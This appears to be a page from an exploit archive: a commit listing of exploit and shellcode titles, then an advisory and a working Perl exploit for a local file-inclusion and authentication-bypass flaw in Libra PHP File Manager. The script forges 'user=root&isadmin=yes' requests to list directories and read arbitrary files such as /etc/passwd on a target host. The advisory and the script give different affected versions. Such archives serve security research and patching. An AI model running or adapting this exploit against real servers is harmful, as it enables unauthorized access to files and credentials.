880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
101 lines
No EOL
3.3 KiB
Perl
Executable file
101 lines
No EOL
3.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/31403/info
|
|
|
|
Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
|
|
|
|
Libra File Manager 2.0 and prior versions are available.
|
|
|
|
#! /usr/bin/perl
|
|
|
|
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
|
|
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
# Program: Libra PHP File Manager
|
|
# Version: <= 1.18
|
|
# File affected: fileadmin.php
|
|
# Download: http://file.sourceforge.net
|
|
#
|
|
#
|
|
# Found by Pepelux <pepelux[at]enye-sec.org>
|
|
# eNYe-Sec - www.enye-sec.org
|
|
# Greetings to Ka0x for help me with the perl code :)
|
|
#
|
|
# You can scale directories and read any file that you have permissions
|
|
|
|
use LWP::UserAgent;
|
|
$ua = LWP::UserAgent->new;
|
|
|
|
print "\e[2J";
|
|
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
|
|
|
my ($host, $path, $action) = @ARGV ;
|
|
|
|
unless($ARGV[2]) {
|
|
print "Usage: perl $0 <host> <path> <action>\n";
|
|
print "\tex: perl $0 http://www.example.com /etc/ list\n";
|
|
print "\tex: perl $0 http://www.example.com /etc/passwd edit\n";
|
|
print "Actions:\n";
|
|
print " list:\n";
|
|
print " edit:\n\n";
|
|
exit 1;
|
|
}
|
|
|
|
$ua->agent("$0/0.1 " . $ua->agent);
|
|
$host = "http://".$host if ($host !~ /^http:/);
|
|
$path = $path."/" if ($action eq "list" && $path !~ /\/$/);
|
|
$op = "home" if ($action == "list");
|
|
|
|
if ($action eq "edit") {
|
|
$aux = $path;
|
|
$directory = "";
|
|
|
|
do {
|
|
$x = index($aux, "/");
|
|
$y = length($aux) - $x;
|
|
$directory .= substr($aux, 0, $x+1);
|
|
$aux = substr($aux, $x+1, $y);
|
|
} until ($x == -1);
|
|
|
|
$path = $directory;
|
|
$file = $aux;
|
|
$op = "edit";
|
|
}
|
|
|
|
$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
|
|
$url .= "&fename=".$file if ($action eq "edit");
|
|
|
|
$req = HTTP::Request->new(GET => $url);
|
|
$req->header('Accept' => 'text/html');
|
|
|
|
$res = $ua->request($req);
|
|
|
|
if ($res->is_success) {
|
|
$result = $res->content;
|
|
|
|
if ($action eq "edit") {
|
|
print "Viewing $path$file:\n";
|
|
print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
|
|
}
|
|
else {
|
|
print "Files in $path:\n";
|
|
$x = index($result, "Files:") + 6;
|
|
$result = substr($result, $x, length($result)-$x);
|
|
$result =~ s/<[^>]*>//g;
|
|
$result =~ s/Filename//g;
|
|
$result =~ s/Size//g;
|
|
$result =~ s/Edit//g;
|
|
$result =~ s/Rename//g;
|
|
$result =~ s/Delete//g;
|
|
$result =~ s/Move//g;
|
|
$result =~ s/View//g;
|
|
$result =~ s/Open//g;
|
|
$result =~ s/\d*//g;
|
|
$result =~ s/\s+/\n/g;
|
|
$x = index($result, "Copyright");
|
|
$result = substr($result, 0, $x);
|
|
print $result;
|
|
}
|
|
}
|
|
else { print "Error: " . $res->status_line . "\n";} |